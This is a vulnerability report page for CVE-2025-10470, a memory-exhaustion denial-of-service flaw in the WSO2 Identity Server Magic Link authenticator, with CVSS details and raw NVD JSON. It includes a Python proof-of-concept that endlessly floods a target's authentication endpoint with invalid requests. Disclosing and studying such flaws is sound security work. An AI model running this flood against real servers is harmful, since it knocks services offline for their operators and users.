Security Vulnerability Report
CVE-2025-10470 CVSS 8.6 HIGH

CVE-2025-10470

Published: 2026-05-11 12:16:11
Last Modified: 2026-05-11 12:16:11
Source: ed10eef1-636d-4fbe-9993-6890dfa878f8

Description

The Magic Link authentication flow accepts multiple invalid authentication requests without adequate rate limiting or resource control, leading to uncontrolled memory usage growth. This vulnerability can result in a denial-of-service condition, causing service unavailability for deployments that utilize the Magic Link authenticator. The impact is limited to these specific deployments and requires repeated invalid authentication attempts to trigger.

CVSS Details

CVSS Score
8.6
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

WSO2 Identity Server (see the official advisory WSO2-2025-4469 for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL for Magic Link authentication (example)
target_url = "https://target-wso2-server/commonauth"

headers = {
    "User-Agent": "CVE-2025-10470-POC",
    "Content-Type": "application/x-www-form-urlencoded",
    "Accept": "application/json",
}

# Data representing an invalid Magic Link request
payload = {
    "username": "[email protected]",
    "authenticator": "org.wso2.carbon.identity.application.authenticator.magiclink.MagicLinkAuthenticator",
    "type": "magiclink",
}


def attack():
    print("[*] Starting DoS attack on Magic Link flow...")
    try:
        while True:
            # Send POST request to trigger memory growth
            response = requests.post(target_url, data=payload, headers=headers, timeout=5)
            if response.status_code == 200 or response.status_code == 401:
                print(f"Request sent, server status: {response.status_code}")
    except KeyboardInterrupt:
        print("\n[!] Attack stopped by user.")
    except Exception as e:
        print(f"[!] An error occurred: {e}")


if __name__ == "__main__":
    attack()
```

References

https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2025-4469/ (vendor advisory WSO2-2025-4469)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10470", "sourceIdentifier": "ed10eef1-636d-4fbe-9993-6890dfa878f8", "published": "2026-05-11T12:16:10.530", "lastModified": "2026-05-11T12:16:10.530", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Magic Link authentication flow accepts multiple invalid authentication requests without adequate rate limiting or resource control, leading to uncontrolled memory usage growth.\n\nThis vulnerability can result in a denial-of-service condition, causing service unavailability for deployments that utilize the Magic Link authenticator. The impact is limited to these specific deployments and requires repeated invalid authentication attempts to trigger."}], "metrics": {"cvssMetricV31": [{"source": "ed10eef1-636d-4fbe-9993-6890dfa878f8", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.0}]}, "weaknesses": [{"source": "ed10eef1-636d-4fbe-9993-6890dfa878f8", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2025-4469/", "source": "ed10eef1-636d-4fbe-9993-6890dfa878f8"}]}}